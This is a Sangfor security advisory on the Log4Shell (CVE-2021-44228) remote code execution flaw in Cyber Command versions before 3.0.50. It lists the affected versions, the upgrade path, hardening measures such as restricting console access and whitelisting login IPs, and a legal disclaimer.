Vulnerability Overview
On 10 December 2021, Apache Log4j2 Remote Code Execution (RCE) vulnerability (CVE-2021-44228), also known as Log4Shell was announced. This vulnerability exists in some previous versions of Sangfor Cyber Command. Attackers can exploit the vulnerability to run remote code execution and gain total access to the Cyber Command server. Sangfor has released a patch for this vulnerability.
No other Sangfor Products including IAG, NGAF, Endpoint Secure, HCI, VDI, SSLVPN, WANO and CM are affected at this time.
Versions and Fix
The scope of the vulnerability is for Sangfor Cyber Command versions before v3.0.50. Version 3.0.50 and newer will not be affected. The vulnerability mentioned above can be mitigated by upgrading Cyber Command to v.3.0.50 or v3.0.59. For customers who have "Allow Automatic Updates" enabled, Cyber Command will have automatically installed the update if online. For customers who do not have automatic updates enabled, Cyber Command needs to be updated manually by installing this patch.
Consequences
Attackers can use this vulnerability to execute arbitrary code on Cyber Command through RCE, potentially giving the attackers complete access to the server.
Vulnerability Introduction
The Apache log4j library used by Cyber Command allows for developers to log various data within their application. In certain circumstances, the data being logged originates from user input. Should this user input contain special characters and be logged using log4j, the Java method lookup will be called to execute the user-defined remote Java class in the LDAP server. This will in turn lead to RCE on Cyber Command.
Precautions & Measures
- Upgrade Cyber Command to version 3.0.50 or later.
- Enable automatic updates.
- Please make sure that the Internet-facing console access permission of Cyber Command is turned off. If you need to perform remote operation and maintenance, you can use an SSL VPN or other methods to access the intranet first.
- Set a whitelist restriction for the login IP address to Cyber Command, allowing access only to security operation and maintenance personnel.
Download the Current Version of Cyber Command
Download the following from the Sangfor Cyber Command Community Download page:
- Upgrade file for Cyber Command version 3.0.49 and below
- Latest patch file for Cyber Command
- Full installation file for the latest version of Cyber Command
Source of vulnerability
National Vulnerability Database (NVD): CVE-2021-44228
Sangfor Security Emergency Response External Service
Statement
Any software/patch you download from Sangfor's service page is the copyrighted work of Sangfor and/or its suppliers. Without Sangfor's permission, you may not disclose relevant information to other third parties, and except for service purposes, you may not further repair, modify, distribute, publish, license, transfer, sell the software/patch, try to extract its source code through decompilation or otherwise attempt to extract any or all of the source code. This document does not promise any express, implied, and statutory guarantees, including, but not limited to, warranties of merchantability, non-infringement, or fitness for a particular purpose. Under any circumstances, Sangfor Technologies Inc., or its directly or indirectly controlled subsidiaries shall not be liable for any losses, including direct, indirect, incidental, inevitable loss of business profits or special losses. You shall bear all legal responsibilities arising from your use of this document in any way. Sangfor can modify or update the content and information of this document at any time.